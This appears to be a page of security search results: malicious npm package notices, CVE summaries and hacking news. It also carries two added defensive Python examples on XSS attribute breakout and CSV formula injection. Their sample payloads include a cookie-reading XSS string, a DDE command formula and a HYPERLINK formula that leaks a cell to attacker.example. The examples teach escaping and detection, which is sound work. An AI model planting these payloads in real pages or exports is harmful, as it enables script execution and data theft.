22 matches found
MAL-2025-48552 Malicious code in tailwindcss-awesomefont (npm)
Source: ghsa-malware 85ee9e62f66e09344e931a1854ac52622771856fda95ece5f148374cc50b406b. Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
CVE-2020-26507
A CSV Injection (also known as Formula Injection) vulnerability in the Marmind web application, version 4.1.141.0, allows malicious users to gain remote control of other computers. By entering formula code in the "Notes" functionality on the main screen, an attacker can inject a payload into th...
MAL-2024-11119 Malicious code in exwx (npm)
Source: ghsa-malware b49adfe29064d8cd3b5231b88df336858fb6897be7f624b8402782e303c58c31. Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
CVE-2024-37825
CVE-2024-37825 concerns EnvisionWare Computer Access & Reservation Control SelfCheck v1.0. The Red Hat, NVD and CVE entries and related advisories describe an unauthenticated directory traversal vulnerability that can be triggered by attackers on the same network. The issue is tied to SelfCheck v1.0 an...
JetBrains TeamCity Security Vulnerability
JetBrains TeamCity is a set of distributed build management and continuous integration tools from the Czech company JetBrains. The tool provides continuous unit testing, code quality analysis, build problem analysis reports and other features. JetBrains TeamCity suffers from a privilege issue...
Sensitive Information Exposure in Sylius
Impact: Any other user can view the data if the browser tab remains open after logging out. Once someone logs out and leaves the browser open, an attacker with access to that browser may use the back button to see the content shown on the affected screens. No action can be performed, though, and any page refresh will...
Cross-site Scripting (XSS) - Stored in livehelperchat/fbmessenger
Description: The application does not escape special characters. The $item->bbcode or $item->name variables can lead to stored XSS. Proof of Concept: Go to the Facebook BBCode List at https://demo.livehelperchat.com/siteadmin/fbmessenger/newbbcode and add an item with an XSS payload in the name or bbcode fields,...
Cross-site Scripting (XSS) - Stored in livehelperchat/livehelperchat
Description: The Mobile Options settings page does not sanitise or escape the $mboptions['fcmkey'] parameter, leading to stored XSS. Proof of Concept: Go to Mobile settings and fill the FCM Key field with an XSS payload such as: somekey" Impact: XSS can have huge implications for a web application and its users. User...
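Both livehelperchat entries above are the same bug class: a stored setting is written into HTML without escaping. The FCM Key proof of concept (a value beginning with somekey") shows the attribute-context variant, where the payload needs no angle brackets at all; it only has to close the value="..." attribute it is placed in. The following is an added example, not code from livehelperchat (which is PHP): it renders a settings field three ways in Python and uses the standard library HTML parser to show which attributes a browser would end up with. The field markup, the function names and the onfocus/autofocus payload are constructed for the illustration.

```python
import html
from html.parser import HTMLParser

# Constructed payload in the shape the advisory describes: it carries no '<' or '>'
# and relies entirely on the double quote to break out of the value="..." attribute.
SAMPLE_PAYLOAD = 'somekey" onfocus="alert(document.cookie)" autofocus="'


def render_fcm_field_unsafe(fcm_key):
    """Vulnerable pattern: the stored setting is interpolated verbatim into an attribute."""
    return f'<input type="text" name="fcmkey" value="{fcm_key}">'


def render_fcm_field_tagonly(fcm_key):
    """Still vulnerable: stripping angle brackets does nothing in an attribute context."""
    cleaned = fcm_key.replace("<", "").replace(">", "")
    return f'<input type="text" name="fcmkey" value="{cleaned}">'


def render_fcm_field_safe(fcm_key):
    """Fixed: escape &, <, >, " and ' so the value cannot terminate the attribute."""
    return f'<input type="text" name="fcmkey" value="{html.escape(fcm_key, quote=True)}">'


class _InputAttrs(HTMLParser):
    """Collect the attributes a parser assigns to the <input> tag."""

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.found.append(dict(attrs))


def input_attributes(fragment):
    """Parse a rendered fragment and return the attribute dict of its first <input>.

    If the key has broken out of value="...", extra attributes (onfocus, autofocus)
    show up here; if escaping worked, the whole payload is back inside 'value'.
    """
    parser = _InputAttrs()
    parser.feed(fragment)
    parser.close()
    return parser.found[0] if parser.found else {}


def is_attribute_breakout(fragment):
    """True when attributes other than the three the template wrote appear on the tag."""
    expected = {"type", "name", "value"}
    return not set(input_attributes(fragment)) <= expected


if __name__ == "__main__":
    for render in (render_fcm_field_unsafe, render_fcm_field_tagonly, render_fcm_field_safe):
        markup = render(SAMPLE_PAYLOAD)
        print(f"{render.__name__}: breakout={is_attribute_breakout(markup)}")
        print("   ", markup)
```

The tag-only filter is included because "remove < and >" is a common but wrong response to an XSS report; the fix is context-aware escaping of every output point, which in PHP means htmlspecialchars() with ENT_QUOTES for attribute values.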
Elasticsearch Kibana CSV Injection Vulnerability
Kibana is a suite of open source, browser-based analytics and search dashboard tools for Elasticsearch, from Elastic (Netherlands). A CSV injection vulnerability exists in Kibana. An attacker can exploit the vulnerability to run malicious commands on a logged-in user's...
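The Marmind and Kibana entries above are both CSV (formula) injection: user-controlled text is exported unchanged, and a spreadsheet opening the file evaluates any cell that begins with =, +, -, @, tab or carriage return. The following is an added example, not code from either product. It shows a Python exporter in its vulnerable and hardened forms plus a scanner that audits an existing CSV for evaluable cells; the sample rows, the attacker.example host and the function names are constructed for the illustration.

```python
import csv
import io

# Leading characters that make Excel, LibreOffice and Google Sheets evaluate a cell
# as a formula instead of displaying it as text.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample rows standing in for the "Notes" data an exporter would dump.
# Row 2 uses the long-public DDE pattern, row 3 a HYPERLINK that leaks cell A2.
FIELDS = ["id", "name", "notes"]
SAMPLE_ROWS = [
    {"id": 1, "name": "Alice", "notes": "Met on Monday, balance -5"},
    {"id": 2, "name": "Mallory", "notes": "=cmd|' /C calc'!A0"},
    {"id": 3, "name": "Mallory", "notes": '=HYPERLINK("https://attacker.example/?"&A2,"Open")'},
    {"id": 4, "name": "Bob", "notes": -5},
]


def _is_number(text):
    try:
        float(text)
        return True
    except ValueError:
        return False


def neutralize_cell(value):
    """Return value as text a spreadsheet will not evaluate.

    Real numbers pass through unchanged so negative balances still sort and sum.
    Any other value starting with a trigger character gets a leading apostrophe,
    which spreadsheets treat as "this cell is text" and do not display.
    """
    if isinstance(value, (int, float)) and not isinstance(value, bool):
        return str(value)
    text = str(value)
    if text.startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_rows(rows, fieldnames, neutralize=True):
    """Write rows as CSV. neutralize=False reproduces the vulnerable export."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        cells = {k: row.get(k, "") for k in fieldnames}
        if neutralize:
            cells = {k: neutralize_cell(v) for k, v in cells.items()}
        writer.writerow(cells)
    return buf.getvalue()


def find_formula_cells(csv_text):
    """Audit an existing CSV: list (row, column, value) for cells a spreadsheet would evaluate.

    Numeric strings such as "-5" are skipped so plain negative numbers are not reported.
    """
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if cell.startswith(FORMULA_TRIGGERS) and not _is_number(cell):
                hits.append((r, c, cell))
    return hits


if __name__ == "__main__":
    print("vulnerable export flags:", find_formula_cells(export_rows(SAMPLE_ROWS, FIELDS, neutralize=False)))
    print("hardened export flags:  ", find_formula_cells(export_rows(SAMPLE_ROWS, FIELDS)))
    print(export_rows(SAMPLE_ROWS, FIELDS))
```

The apostrophe prefix alters string data that legitimately starts with a trigger character (a note reading "-5" becomes '-5), which is why numeric types are passed through and why the scanner ignores numeric strings; quoting every field (QUOTE_ALL) is still required so that commas and quotes inside a cell cannot shift data into another column.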
CVE-2019-3424
An authentication issue exists in C520V21 smart camera devices, versions V2.1.14 and below. An attacker can automatically obtain access to the web service from an authorized browser on the same computer and perform operations...
LuminosityLink Hacking Tool Author Gets 30-Months Prison Sentence
A 21-year-old Kentucky man who previously pleaded guilty to developing, marketing, and selling an infamous remote access trojan (RAT) called LuminosityLink has now been sentenced to 30 months in prison. According to a press release published Monday by the U.S. Attorney's Office, Colton Grubbs, who used...
CVE-2017-9961
A vulnerability exists in Schneider Electric's Pro-Face GP Pro EX version 4.07.000 that allows an attacker to execute arbitrary code. Installing the malicious code requires access to the computer. By placing a specific DLL/OCX file, an attacker is able to force the process to load an arbitrary DLL...
Code injection
A vulnerability exists in Schneider Electric's Pro-Face GP Pro EX version 4.07.000 that allows an attacker to execute arbitrary code. Installing the malicious code requires access to the computer. By placing a specific DLL/OCX file, an attacker is able to force the process to load an arbitrary DLL...
Medical Study Blasts Hospitals' Security Practices
A scathing rebuke of medical professionals' attitudes toward information security reveals that nurses and doctors fumble over protocols, often putting patients at risk. The revealing study, "Workarounds to Computer Access in Healthcare Organizations" (PDF), offers a fascinating look behind the privacy...
Axis Network Cameras Cross-Site Scripting Vulnerability
Axis network video cameras capture and transmit live images directly over IP networks, enabling users to view and manage the camera system using a web browser. A cross-site scripting vulnerability exists in Axis network cameras. An attacker is able to execute arbitrary script in the victim's browser and...
College Student Gets Year in Prison for Wire Fraud in Tampering With Student Election
A former Cal State San Marcos student was sentenced to a year in prison this week for wire fraud and other charges related to election tampering by using keystroke loggers to grab student credentials and then vote for himself. Matthew Weaver, 22, of Huntington Beach, Calif., stole almost 750...
New Jersey mayor arrested for hacking recall website
The FBI last week arrested the mayor of the northern New Jersey town of West New York, together with his son, on charges of hacking into a website and a related email account that called for the mayor's recall. Felix Roque, 55, the mayor of Wes...
Pro-Syrian Malware Targets, Impedes Activists
The Electronic Frontier Foundation (EFF) warned this week that political activists in Iran and Syria are being targeted by malware attacks disguised as Adobe Flash Player updates on YouTube. In a blog post on Thursday, the EFF's Eva Galperin and Morgan Marquis-Boire said the attacks occur after...
Snail mail the drive
Not comfortable sticking your precious mobile device in the mail? Remove the hard drive from the device and snail mail that to your destination. If you’re flying, pack it in your checked bag. If necessary, you can travel with a second, blank hard drive in case you need access to the computer whil...